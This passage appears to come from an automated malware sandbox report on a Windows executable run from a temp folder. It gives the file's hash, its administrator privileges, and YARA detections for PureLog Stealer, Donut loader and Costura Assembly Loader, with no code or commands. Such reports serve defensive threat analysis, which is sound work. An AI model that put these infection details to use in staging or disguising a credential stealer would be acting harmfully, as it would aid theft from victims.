                          Commandline: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe
                          Imagebase: 0x510000
                          File size: 7'168 bytes
                          MD5 hash: E8CE921868FE7C47FD2C236555EE5BFD
                          Has elevated privileges: true
                          Has administrator privileges: true
                          Programmed in: C, C++ or other language
                          Yara matches:
                          • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 0000000B.00000002.2160867351.0000000006470000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000B.00000002.2048354854.0000000003AB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000B.00000002.2167920075.0000000007520000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 0000000B.00000002.2048354854.0000000003F2D000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000B.00000002.1995844689.00000000029BF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 0000000B.00000002.1995844689.0000000002C74000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000B.00000002.2219301967.0000000007C40000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000B.00000002.1995844689.000000000289B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          Antivirus matches:
                          • Detection: 100%, Joe Sandbox ML
                          Reputation: low
                          Has exited: true

                          No disassembly